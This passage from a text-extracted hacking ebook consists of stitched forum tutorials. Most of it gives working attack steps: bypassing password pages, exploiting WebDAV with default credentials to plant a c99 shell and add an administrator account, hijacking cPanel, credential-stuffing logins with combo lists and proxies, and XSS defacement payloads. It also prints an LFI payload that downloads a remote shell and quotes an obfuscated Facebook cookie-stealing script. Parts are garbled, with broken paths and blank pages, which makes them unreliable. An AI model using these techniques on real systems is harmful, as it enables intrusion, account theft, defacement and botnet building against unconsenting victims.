Here are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com . Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a „games‟ directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there. For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can‟t get past an opening “PasswordRequired” box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it‟s hosted by www.host.com at 100.100.100. 1. We then go to 100.100.100.1, and then launch \Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don‟t care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let‟s say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be on the index page and ready to follow the links for downloading.

Mail:mtahirzahid@yahoo.com

Page 212


Power Of Hacking速 Hack WebDAV & Deface Alright guy's today in this tutorial I'll be explaining how to use the webdav exploit. The link for the tools used for this tutorial can be found in the bottom of this tutorial. For those of you who do not know what a Webdav is here is the definition. Web-based Distributed Authoring and Versioning, or WebDAV, is a set of extensions to the Hypertext Transfer Protocol (HTTP) that allows computer-users to edit and manage files collaboratively on remote World Wide Web servers. But fo our purpose we will be using it to exploit RDP's or the Remote Desktop Protocal. For a better understanding of these with RDP's they could range from Vp's to Dedi's to just plain old home Pc's, but no matter what it is you will gain full access to the machine and can basically do whatever you want using a shell. For those of you who are new to the hacking scene a shell is a php script that allows you to view all of the files on the server you decide to host the shell on. The most common shells are the c99 or the r57, but in this case we will be using the c99. Now please be aware these are not the only shells available there are several posted throughout the forum and you can find them by simply using the search button located on the navbar. Now before being able to use the shell we have to find some vulnerable Ip's to gain access to for this we will be using the WebdavlinkCrawler which can be found in the webdav tools kit I have provided below here if you don't trust my download links simply don't download them it's that simple. Once you have managed to open the program you will be presented with this interface.

as you can see there is a Start, Stop, and Remove double. All of these terms will be explained later on, but what you are going to want to do is click the start button and it will being to search for the Ip's with webdav in them. Once you have managed to gather some ip's like you see in the picture here

Mail:mtahirzahid@yahoo.com

Page 213


Power Of Hacking速

Now please be aware this was only with about 15 seconds of searching and your results may differ depending on your connection speed as well as the amount of time you run the application. After you have all of your Ip's your going to want to click one so it's highlighted and the right click it you will be presented with a popup that looks like this

I have no idea what that actually means,(if someone would like to translate and tell me please feel free.) but what it is doing is copying all of the Ip's you have scanned. After you have scanned all of the Ip's your going to want to paste them in a new word document

Mail:mtahirzahid@yahoo.com

Page 214


Power Of Hacking速

once you have done so save it as something you can remember and put it in a convenient location. After you have saved your collected webdav Ip's in a word document your going to want to open the Ip Scanner in the folder. It will look like this

what your going to want to do is click the "Get Ip's" button and browse to your recently saved text file. After you have your ip's in place

your going to want to press the scan button what this is doing is now taking all of your Webdav Ip's and figuring out which one's are vulnerable to this particular exploit. The one's Mail:mtahirzahid@yahoo.com

Page 215


Power Of Hacking速 on the right are the ones it scanned and if you happen to get any in the middle those are the one's you can exploit. In my case this time I didn't happen to have any that were open to this exploit because I had a limited amount of Ip's. After you have managed to gather some ip's in the middle column and are ready to exploit the server you can just double check by going to the ip/webdav/ in your browser and Ip being one of the exploited ones you managed to get and your going to be looking for an index page that says Webdav Test page. After you have confirmed it is ready to go your going to want to open "map network drive" this can be found by either right clicking Network or my computer in the start menu.

what your going to want to click on is the hyperlink that reads " Connect to a website that you can use to store your document's and pictures. You will be presented with a screen all you have to do is click next. And the your going to want to click Choose a custom network location.

Mail:mtahirzahid@yahoo.com

Page 216


Power Of Hacking速

Now this is the important screen it should look like this

What you have to do is put the Ip/webdav in the text box and click next

Mail:mtahirzahid@yahoo.com

Page 217


Power Of Hacking速

you should then be prompted with a login box the default username is wampp and the default password is xampp. Once you have successfully connected you can now browse it's folder's so what you have to do now is just drag and drop the shell.php in side the main directory

After doing so go to ip/webdav/shell.php it should look like the following

Mail:mtahirzahid@yahoo.com

Page 218


Power Of HackingÂŽ

Feel free to use that Ip if you are that much of a noob and cannot do anything for yourself. Once you are viewing your shell inside the execute textbox your going to want to do the following commands net localgroup administrators SUPPORT /Add What this is doing is making the remote desktop username SUPPORT and the password !password!. So now the last and final step is to open remote desktop and connect using the Ip and the login detail's we have just created. The shell is for you to explore and discover for yourself. Now you may be wondering What can you do once your in? Answer : 1.You can do so much! Plant Rootkits/ Upload your RAT on the server:D 2. I upload my RAT’s incase they try to take back there dedi. 3. Host a web IRC bot or Shell Booter 4. Store files or host websites or shells 5. Make a Botnet! TOOLS http://dl.dropbox.com/u/18083172/Webdav%20tools.rar How to: Convert Computer in WebServer - Host Webpages For Free Wanted to know that how can we convert our own computer into a web server? So that you may access your public data at any time from any place? Were you eager of this before? OK, Hackersthirst is here to help you in this tech and hacking world, I am going to show you that How can you make your computer a web server inorder to host your own files and also webpages in HTML. This conversion will help you in creating sql, php and much other databases (Visit download link provided below).So, that you may be able to test your website that how will its look online. There is another benefit that often you get banned by hosting providers for hosting your phishing pages and scripts or some illegal crap to hosting, This will surely help you getting out of this mess and you will be able to host your phishing page freely in order to hack a victim.

Mail:mtahirzahid@yahoo.com

Page 219


Power Of Hacking速 For this purpose we can use many softwares like wamp and others, But i recommend you using xampp, You can download xampp from here. There are many flavors available you can use it with linux, Windows and Mac also. After downladoing just follow my steps: Step 1) Download the program and install it (Prefer another drive rather than c:/program files for installation, Otherwise in vista and seven inorder to avoid software functions restriction you may have to deactivate UAC (Windows Vista User account control) with msconfig later). During installation you will be prompted for following options, Choose what you want, I have just selected following : -

After that press next and installation will start:

Step 2) In the end it will ask that do you want to run xampp control panel hit OK and you will see control panel infront of you. And start the following services, you may start others as per your requirements!

Mail:mtahirzahid@yahoo.com

Page 220


Power Of Hacking速

Afterwards go to your browser and put 127.0.0.1 or localhost in the browser address bar, You will get following screen after selecting right language!

Inorder to check that your local hosting is accessable publically then use your public/external ip address and put it in browser address bar and hit enter, You will get this page:

Mail:mtahirzahid@yahoo.com

Page 221


Power Of Hacking速

So, Yo have to edit "httpd-xamp.conf" file now, Just go to "httpd-xamp.conf" and find and remove "deny from all" and save it. Path of such files is here : Your Drive:\xampp\apache\conf\extra

So, After Mail:mtahirzahid@yahoo.com

Page 222


Power Of Hacking速 deleting "Deny from all" Save it (Ctrl+S) And Thus you are done. In the end restart the server by restarting the software and i hope that it will work now. Where to host and upload your pages: Yes, this is most important question, There will be a directory named htdocs where you have installed xampp and thus I may say it will be in drive:\xampp\htdocs , What you will upload in it will be available to the whole world from your public ip address. Suppose you have made index.html and this inorder to access it you will have to paste it in htdocs directory and it will be accessible at: http://Your-public-ip/index.html OR http://localhost/index.html Yes, public ip address link will work in whole world while local host in your local network as i described above.You can start and stop services from control panel of xampp also you can use filezilla too. If you want to get a domain name: Just singn up to the no-ip.com and get a domain or host for your ip address. But question is here that our ip address is dynamic and to which ip domain name will point, Yes, There is solution by no-ip.com, Just go to downloads and get their dynamic DNS update client and run on PC. It will automatically point that domain to your current ip-address. Inorder to get more and step wise information for setting up domain, You should read the start of this post here, Where i have used no-ip.com for setting up your own domain name for cyber gate with ip address. How to: Setup your own Home ftp Server This post is about how to setup/make your own ftp server at home, With your personal laptop or computer. Using this server there are many benefits, First you can access your files from anywhere in the world and also another good thing that you can upload what you want, from anywhere. So, it means that you can work on the go on your own pc in save environment. What you will need is this: 1) A 24hour working ineternet connection (As ftp will get offline if your computer is not connected to internet) 2) My method to convert your computer in ftp server. Hope, the above things are not a big deal. Lets, start the tutorial!

Mail:mtahirzahid@yahoo.com

Page 223


Power Of Hacking速 Get a copy of FileZilla ftp Server : You can download it from here. After downloading, surely we have to install it, Installation is simple and just required next to be pressed. Now, the following (In the Screen Shot) step will come and the installation will ask that install a service in windows to start the server, you should choose what you want and what is required, well for me the default settings are perfect as the ftp server will be on default. See,

Screen Shot below: By Default this is the port number i-e 14147 , You can also change the port number, But remember that the port must be opened, In this post in last step I have already shown some short tricks to open the port required, also you can login into your modem or router for port forwarding purpose. (After installing the software, if ftp server doesn't work from outside homegroup then check that whether port is forwarded or not, then if not do it manually like i told). After Installtion is Complete:

Now, After installation run the filezilla ftp server and when you will run it first time it will ask for the administration password and also port number. Give a password of your choice.Since the server is running on your PC - the same one the admin interface is running on - its address is localhost, or 127.0.0.1, See screen shot! Note:check off the "Always connect to this server" box to bypass this dialog in the future. a) Creating Server Users: Mail:mtahirzahid@yahoo.com

Page 224


Power Of Hacking速 Now, the ftp server is up and running but no one can use it since admin haven't granted permissions to anyone, In other you have to add users which will be authorized to use this server. To do this, Go to Edit>>Users and after that hit the add button on right side. Now, Give user name say wamiq as i did, and also give a password as mentioned in screen shot

below: You can also setup ssl for user login for more security. After this we have to select permissions , folder to be shared so go to Shared Folders.

Selecting the read only will allow the user to read and download the data, but if you will select write also then the user is capable of writing the data also.After that press ok. Now your computer is converted into ftp server.

Mail:mtahirzahid@yahoo.com

Page 225


Power Of Hacking速 Using Your Own Created ftp server: Now its time to connect to server and try uploading and downloading. We have to use a ftp client for this purpose: Get filezilla (recommended) or else there are many other i have recommneded filezilla as it is freeware and in open source, also cuteftp is present but you may have to purchase it. If you don't know how to use filezilla go here (How to Upload files to website Using Filezilla). Now, After downloading and installing any ftp client, in the host field there will be 127.0.0.1 if its homegroup or else use your public ip address, (As your external ip address will allow you to connect from anywhere in the world, But for this you have to port forward from your modem or consult your dsl provider also). Now in ftp client the user name will be the one which we have given above and password will also be the same which we have assigned for user! As you are seeing that i have successfully accessed my ftp server using ftp client filezilla, So now i can upload and download files using my login or else i can give this to any friend to upload the required files here. Hi Everyone Today i will show you a method , how to hack a cpanel in the server very easily.. ReQuirement: shelled server+access to path before public_html.. You have a shell , alright go to the path before /public_html "xxxx/public_html/" you gonna find a file there called ".contact" or "contactemail" edit it and replace with your email and save it . Now You Have to reset the password of cPanel. To do this:1. Go to Host. 2. Click the Control Panel Login button. 3. Click the "Forgotten Password" link. 4. Enter your Domain Name or Username . 5. Click "Lookup Account". Reseting your password: 1. Open ur email (which u replace there).

Mail:mtahirzahid@yahoo.com

Page 226


Power Of Hacking速 check inbox.u ll find 1 msg sent from support@targethost.com 2. Click the reset password link 3. Enter your new password in the New Password text box. 4. Enter your new password in the New Password (again) text box. 5. Click the Change password button. This will take you to a completion page. 6. Click the RELOGIN option. This will take you to a sign in page

Hacking porm site:Step 0 - The Tools 1.Athena II 2.Raptor 3 3.Proxy Finder 4.Proxy Checker 5.CForce Download All Tools! HERE###(https://adf.ly/6bBi )

Mail:mtahirzahid@yahoo.com

Page 227


Power Of Hacking速

Step 1 - Athena II 1.Run Athena II. 2.Setup Athena II. 3.Click Start. 4.Wait about 5~10 min. and click stop... 5.Copy Logins.txt from Athena II folder to the desktop. Step 2 - Raptor 3 1.Open Raptor 3. 2.Go to File > Open and in the dialog open logins.txt from desktop. 3.In Tools click "Remove Duplicats". 4.Go to Filet in Tools > Click on "Custom Filters" tab. 5.Right click in empty spot > click "Add". 6.In filter name type "bangbros" > Action: Keep If > Filter Subject: Line > Condition: Has > Amount: Any > Filter: What: bangbros > Click Ok. 7.Check the new made filter and click filter buton under empty spot. 8.In Generators select "Pass Leecher" > Right click at emty spot > click on "Add" > Select logins.txt from decktop > click "Leech" buton under emty spot. 9.Now go to File > Save All > Save the file as Combo.txt on desktop. Step 3 - Proxy Finder (Click to Hide) 1.Open ProxyFinder. 2.Click "Find" button. 3.When its done click "Save" button and save as Proxy.txt on desktop. Step 4 - Proxy Checker (Click to Hide) 1.Open Proxy Checker. 2.On Proxy field click "Load" button and load Proxy.txt from desktop. 3.Click "Start" button. 4.When its done click "Save" button on Responding Proxys field and save as CheckedProxys.txt on desktop. Step 5 - CForce (Click to Hide) 1.Open CForce. 2.Click on "Auto" tab. 3.In url field type the members login url from the site that you want to hack. 4.At "Proxy-List" field click on "Load" button and load CheckedProxys.txt from desktop. 5.At "Combo-List" field click on "Load" button and load Combo.txt from desktop. 6.Click start and wait till its done. 7.When its done you will have working logins here. How to deface website with Cross Site Scripting ? : Complete XSS Tutorial

Mail:mtahirzahid@yahoo.com

Page 228


Power Of Hacking® Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it‟s bad idea..! Script for chaning the background Color of a website: <script>document.body.bgColor=”red”;</script> Script for chaning the background image of a website: <script>document.body.background=”http://your_image.jpg“;</script> Defacement Page with Pastehtml: First of all upload some defacement page(html) to pastehtml.com and get the link. When you find a XSS vulnerable site, then insert the script as : <script>window.location=”http://www.pastehtml.com/Your_Defacement_link”;</script> This script will redirect the page to your pastehtml defacement page. Note: You can deface only persistent XSS vulnerable sites. Atm Hack:There are 10,000 possible combinations that the digits 0-9 can be arranged into to form a four-digit code. if users select a four-digit password for an online account or other web site, it's not a stretch to use the same number for their four-digit bank PIN codes. when it comes to selecting passwords. Nearly 11% of the 3.4 million four-digit passwords analyzed were 1234. The second most popular PIN in is 1111 (6% of passwords), followed by 0000 (2%) list of the most common numerical and word-based passwordsand found that "password" and "123456" topped the list.)

Mail:mtahirzahid@yahoo.com

Page 229


Power Of Hacking®

a whopping 26.83% of all passwords could be guessed by attempting just 20 combinations of four-digit numbers (see first table). Days, Months, Years Many of the commonly used passwords are, of course, dates: birthdays, anniversaries, year of birth, etc.

Somewhat intriguing was #22 on the most common password list: 2580. It seems random, but if you look at a telephone keypad (or ATM keypad), you'll see those numbers are straight down the middle ¡ª yet another sign that we're uncreative and lazy password Mail:mtahirzahid@yahoo.com

Page 230


Power Of Hacking速 makers. The Least Predictable Password The least-used PIN is 8068 How To Upload Shell Via LFI Vul.

Today I Am Going To Teach You Two Ways Of Uploading Shell Via LFI Vul.. ReQuirement:- website vul to lfi. MethoD 1:NOTE: You will need FireFox and its addon Tamper Data to do this method! LFI or Local File Inclusion allows you to include a local file(which means, that the file is stored on the server) and run it in a webscript. In this method we are going to upload a shell by accessing the proc/self/environ. Now we have our page:http://www.target.com/index.php? include=register.php And now we are going to do this:http://www.target.com/index.php? include=../ Mail:mtahirzahid@yahoo.com

Page 231


Power Of Hacking速 If it gives you an error message , this is good. Best thing that can happen is, it says "No such file or directory". But anyways, now add this to your url:http://www.target.com/index.php? include=../etc/passwd And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like: http://www.target.com/index.php? include=.../passwd http://www.target.com/index.php? include=.../passwd http://www.target.com/index.php? include=.../passwd And so on. Now let's say we got to this URL:-

http://www.target.com/index.php? include=.../passwd And we see some huge shitty text we can not handle with. Now change the etc/passwd in the URL to proc/self/environ so it would look like this: http://www.target.com/index.php? include=...environ If you see some text, you did good, if you see an error message you did bad. Now this is the point where we use Tamper Data. Start you Tamper and reload the page, and for user agent you type in the following PHP script:PHP Code:<?php $file = fopen ("shell.php" ,"w +"); $stream = fopen ( "http:// www.website.com/ yourshell.txt" , "r" ); while(! Mail:mtahirzahid@yahoo.com

Page 232


Power Of Hacking速 feof($stream )) { $shell .= fgets ($stream ); } fwrite ($file , $shell ); fclose ($file );?> This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is being displayed on the webpage, and if you put in a webscript for that, it will execute it. Now simply access your shell by going to http://www.taget.com/shell.php And rape the server.Now LFI method 2:- NOTE: This only works on apache servers! Alright you get back to the point where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd, you will try to get access to apache/ logs/error.log If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1). Now when you have found the file, open up cmd and type in Code:telnet http://www.tagrget.com 80 When you are inside the telnet, you copy the following code (you use your own shell url:PHP Code: <?php $file = fopen ("shell.php" ,"w +"); $stream = fopen ( "http:// www.website.com/ yourshell.txt" , "r" ); while(! feof($stream )) { $shell .= fgets ($stream ); } fwrite ($file , $shell ); fclose ($file );?> Paste it into the telnet window, and press enter once or maybe twice(until you get an error message). Mail:mtahirzahid@yahoo.com

Page 233


Power Of Hacking® Now refresh the page in the browser (error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server. Access it by typing in the following into your browser:- http://www.taget.com/shell.php ENJOY...

Learn How To Enable Your Task Manager If It Is Disabled Enabling Task Manager:Here nothing is needed to be downloaded , the main feature lies in your own computer . Just follow these easy steps.  

Type gpedit.msc in the run. Goto User Configuration>Administrative Templates>System. Now you may see a window like the given one:-

Mail:mtahirzahid@yahoo.com

Page 234


Power Of Hacking®  

Click Ctrl+Alt+Del option. Now you may see four options which are:

1. 2. 3. 4.

Remove change password . Remove Lock Computer . Remove Task Manager . Remove Logoff .

 

Double click option number 3. Now you may see a window like this:

Check Not Configured or Disabled . You are done. You may now see your Task Manager.

Exception (Determine how your Computer has been affected):Simaltaneously there are two types of viruses. One deletes the Task Manager while one changes this key to Enabled. So the type in which the Task Manager is deleted can't be overcome . It is necessary to have an anti-virus like AVAST. The one which deletes Task Manager can only be overcome through these steps. 

Change the window after formatting all the drives and deleting every bit of your data as it can be in your data (Mostly in .exe and programs not in .jpeg or mp3, If you want to save your data then use a bootable Linux USB and copy your precious data in that and make sure that isn't effected one normally skip backing up your programs, take images or songs etc with you, Read here:- Make a bootable 100mb Linux USB | Versatile Uses

Use Avast anti-virus to scan all the drives and it may take much time.

or

Nmap Footprinting tool for hacking and Penetration Testing Defined in Detail Mail:mtahirzahid@yahoo.com

Page 235


Power Of Hacking® So, here I am with another interesting post which is in category of footprinting any available machine with a public IP address I mean which is accessible with from your machine. And you want to audit that completely, like open ports, OS which is running on the machine, Its security, version of the OS, a map of the server, like this it supports a large number of variety scanners. I have already posted a lists of tools which can be used in hacking, But now its time to give their introduction and use to the new-bies so that they may take benefit. My previous post is here:10 Best Security And Hacking Tools For Linux and Windows Download Nmap (Linux, Mac and Windows):  

Nmap For Windows Nmap For Mac Nmap For Linux

Nmap Defined in Detail:I‟ll surely divide every type of scanning technique using Nmap in categories and will give you are brief introduction also, So lets start:TCP Connect:It is quite effective scan. Which results in information regarding open and close ports which may be present in any machine i-e server. It will scan for all the port numbers and will then determine the ports present in the machine after that it will find out that whether these ports are open or not, if these ports are open then surely you will be notified “Open” in front of the port number and if its closed then “close” will be shown. There is one drawback of this kind of scan that if a firewall is running in the victim system then it will surely notify the admin that someone is trying to scan and reach the ports to read whether these are opened for public access or not. And even some advanced firewalls may note the accessing IP address and will also note that which ports have been scanned by using that IP address. So, A new scan form was developed which was stealth. SYN (Synchronize) Stealth Scan For ports:Whenever a TCP connection is created the system sends three packets to the machine to which it wants to be connected.Now talking bit technically the TCP packet has a section header which has flags field which tell us about receiving and about type of the packets. I,ll discuss three flags below:SYN (Synchronize):SYN packets include a TCP sequence number, which lets the remote system know what sequence numbers to expect in subsequent communication. ACK (Acknowledge):Mail:mtahirzahid@yahoo.com

Page 236


Power Of Hacking® It is set of Packets. FIN (Finished):It is meant and is sent when the communication process has been closed. RST (Reset):This is sent when the communication has to be reset that means when it’s closed immediately. Working Scheme:To initiate a TCP connection, the initiating system sends a SYN packet to the destination, which will respond with a SYN of its own, and an ACK, acknowledging the receipt of the first packet (these are combined into a single SYN/ACK packet). The first system then sends an ACK packet to acknowledge receipt of the SYN/ACK, and data transfer can then begin. The stealth scanning basically makes use of this scheme that it sends the SYN packets which is a flag and is well explained above. If SYN/ACK packet is sent back then it means that the tried port is open and at the same time I may call in no time the RST is used and thus connection is tear down and closed immediately. Which will often help you that a log can‟t be save at the remote machine in mean time due to RST.

In other case if the SYN packet is dropped and RST is sent this doesn‟t mean that the port is open it can be assumed that port is closed for other IP‟s but it is open to certain IP‟s of the administrators. Thus we can do further footprinting to check out how to open them. This scan can still be logged but with the help of other options of Nmap we can make it fully undetectable which will be explained later like altering timing etc.

Fin, Null and Xmas Tree Scans (Denoted in Nmap As –sF, –sN and –sX):These three types of scan can be useful, The scheme is this: 

Closed port must respond with RST upon receiving packets. Open ports must drop packet and it can be called as “Listening to SYN”

So in this way you don‟t mean to create a connection and you don‟t send a SYN basically.These scan types will work against any system where the TCP/IP implementation follows RFC 793. As Microsoft windows doesn‟t follow it so we can make use of this in detecting OS running on the machine which is being scanned. Windows will ignore these scan types even on the closed ports too. For example:-

Mail:mtahirzahid@yahoo.com

Page 237


Power Of Hacking® You ran a SYN scan along with any one of the –sF, –sN and –sX scan and SYN shows open ports but not these scan types then surely you are footprinting a machine with Windows OS running. But OS fingerprinting is the most reliable and trustable way to find the OS running on the machine. Ping Scan (Denoted in Nmap As –sP):This type of scan can tell you that which computer is online and which is not that is its purpose rather then to tell which ports are open or not. In Nmap four types of pinging methods are present. Scheme of Ping Scan:First method sends a ICMP ECHO REQUEST (i-e Ping request) if it is received then it means that the remote machine is up and if its lost then Nmap will try for TCP ping as likely the ICMP may be blocked at remote system. As we can get sure that whether the host machine is really offline or else ICMP is being blocked. Then TCP ping sends SYN and ACK packets to any port (Default 80) Now as described above if these packets are returned then remote system is online.If again in case there is no response then it means that the system‟s post under footprinting is filtered.The ICMP scan type can be disabled by setting –P0 (its P zero). UDP Scan (Denoted in Nmap as –sU):In this scan Nmap sends a 0byte packet to the target port and return receipt of ICMP Port Unreachable determines that the port is closed otherwise it is known that the port is open. Microsoft Windows running on Host do not limit the Port Unreachable error generation frequency, and thus it is easy to scan a Windows machine‟s 65,535 UDP Ports in very short time. UDP Scanning is not usually useful for most types of attack, but it can give you information about services or Trojans which depend on UDP, for example SNMP, NFS, the Back Orifice Trojan backdoor and many other exploitable services. Protect Your Computer, Network, and Wi-Fi From Hackers Main reason of hacking attempts is the fact, that the average internet user holds a belief that setting up network security is a complex process, and hence chooses to ignore it altogether. However, as many experts have previously explained, protecting your computer and network from intrusion by hackers is quite an easy task to achieve. It is more or less a case of simple precautionary measures that can ensure your system from being compromised. Here are a few of such measures, that you can take to avoid being a target of a cyber attack :1. Operating system manufacturers often release updates to address security concerns in their existing operating systems. You should make it a habit to keep your particular operating system updated.

Mail:mtahirzahid@yahoo.com

Page 238


Power Of Hacking® 2. Stay aware of the fact that many system hacks are due to user passwords that are easy to guess. So try to make all your passwords as a combination of symbols, numerals and letters which makes it difficult to guess. 3. Stay aware of the fact that many system hacks are due to user passwords that are easy to guess. So try to make all your passwords as a combination of symbols, numerals and letters which makes it difficult to guess. 4. You should use routers for any type of internet connection. Routers use a method known as Network Address Translation commonly abbreviated as NAT, which is functionally similar to a firewall. NAT prevents the ports from being scanned. Apart from that, the router adds to security by using external IP address while the computer utilizes an internal IP address. 5. Use good spyware and virus scanners and keep them updated regularly. This should prevent latest viruses from affecting your system. 6. Use WPA2 encryption technique if you are on a wi-fi network. It is better and comparatively more secure to the WEP encryption technique. 7. A good practice if you are into using wireless networks, is to change the network‟s Service Set Identifier also known as SSID and setting it to invisible. The SSID acts as a unique identifier for your wi-fi network and is broadcasted by your router. This allows other devices which are trying to connect your network, to see your SSID. You can navigate to your router‟s security settings and from there, you can change the network SSID from a manufacturer preset one to the one you desire. Then, you can also make it invisible so that your network will not be discoverable and your router will not broadcast the SSID information. 8. Open access wi-fi hotspots are networks which allow users to connect to them without a password. Open wi-fi networks seem to be lucrative options for accessing web content at places like airports. This is where it could actually become a potentially dangerous option as an intruder might connect to the same network and steal your sensitive information. One simple precaution that you can follow is to limit the content you access on such networks and avoid websites that require you to enter user-sensitive data. The user has to be aware of the threats that surround him, if he wishes to combat them. On a conclusive note, you can really help the cause of protecting yourself from hackers if you follow simple rules and precautions as the ones outlined above. Remain Safe from fraud and Identity Theft at Facebook

Recently i came through another java exploit at facebook, Its asked by the victim to put it in the address bar so that you may be given credits for the games, or like something that you will be the admin of the pages you like. But stop don't listen to him because its just the fraud and a cheap social engineering hack. I recently posted a trick on how to hack pages that is simple and also part of this trick but in the exploit it was just for hacking into page, Mail:mtahirzahid@yahoo.com

Page 239


Power Of Hacking速 But some hackers are trying to get cookies and mobile email of the victim also, by asking him to put that code in the bar of browser and to hit enter, thats more modified form of the exploit. Well, Hacking personal id's isn't a good job if you are doing this for bad cause and for fun purpose. Read my fanpages hack post to get into more detail. What is personal publishing mobile email address for facebook: Its a unique address for every profile and using it we can post statuses and photos etc on the go. We can also get this for any fan page also. Its something like uniqueword@m.facebook.com. Which type of code hackers give to steal your personal email id and cookies? Sometimes its simple like javascript: ........... but in most of the cases they obfuscate it so that you may not know that what is written in it and only broswer can understand it. Its ecoded in ASCII format. Well the basic purpose of obfuscated text is to prevent stealing of the source code of your hardwork and some companies use it for security. But it can also be used for hacking. If any one gives you some code like this below then beware don't put it in address bar since it will steal your cookies of facebook and as well as unique mobile email id for facebook. See code below:

javascript:var _0xbdfc=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\ x45\x6C\x65\x6\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x 3a\x2f\...........x65\x2f\x6d\x6f\x62\x69\x6c\x65\x2e\x6a\x73" ,"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\ x79"];varscript=document[_0xbdfc[1]](_0xbdfc[0]);script[_0xbdf c[2]]=_0xbdfc[3];document[_0xbdfc[5]][_0xbdfc[4]](script);void (0); (Note: I have cut some portion of script so that some other may not steal it to use it for wrong purpose.) Yes its an obfuscated text command, Only browser and understand it, If i decode it i can get the path of the 3rd party hosted script. We can use any available online decoder like this see what i got: http://www.new.........com/time/mobile.js

That is tha path of the real script, If we examine it then we shall come to know its function, Simply put the obtained path in the browser address bar and you will get information. Some part of mobile.js: //Append jquery library var newjs = document.createElement('script');

Mail:mtahirzahid@yahoo.com

Page 240


Power Of Hacking速 newjs.setAttribute('src', 'http://s_o_c_i_a_l_g_i_f_t_s.info/jquery.js'); document.body.appendChild(newjs); setTimeout(function(){ //Grab post form id and other stuff for posting if(location.href == "http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/index.php") { alert("Wrong Page. You must paste the script into your browser's\n address bar on any facebook tab or window.\n\n Then Hit Enter!"); return; } var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1] ); //grab mobiles $.get("http://m.facebook.com/upload.php", function(data){ var mydata = data; var mobiles; var count = 0; $($(mydata).find('a').filter(':contains("m.facebook.com")')). ................. top.location.href = 'http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/ time/check.php?get=1&m=,'+insert; }); },2000); alert("Time Checker Processing - Please wait 2 seconds and click OK to view results."); Mail:mtahirzahid@yahoo.com

Page 241


Power Of Hacking速

See the lines highlighted as red, These wiil appear as the alert in your broswer if you put that obfuscated java in your browser address bar, I haven't shown you the whole script here for security reasons, Another smart thing if you paste this somewhere other then facebook then it will apear: Wrong Page. You must paste the script into your browser's\naddress bar on any facebook tab or window.\n\n Then Hit Enter!

What to do if you followed the hacker's guide and inserted the script in the browser address bar? Answer is quite simple just update your facebook Unique mobile email id. 1. Go to http://m.facebook.com/upload.php 2. Login by using facebook email and password. 3. Reset your email id by clicking Reset Address. CYBER CRIME

Mail:mtahirzahid@yahoo.com

Page 242


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 243


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 244


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 245


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 246


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 247


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 248


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 249


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 250


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 251


Power Of Hacking速

Black Hat Money Maker Tutrial:Mail:mtahirzahid@yahoo.com

Page 252


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 253


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 254


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 255


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 256


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 257


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 258


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 259


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 260


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 261


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 262


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 263


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 264


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 265


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 266


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 267


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 268


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 269


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 270


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 271


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 272


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 273


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 274


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 275


Power Of Hacking速

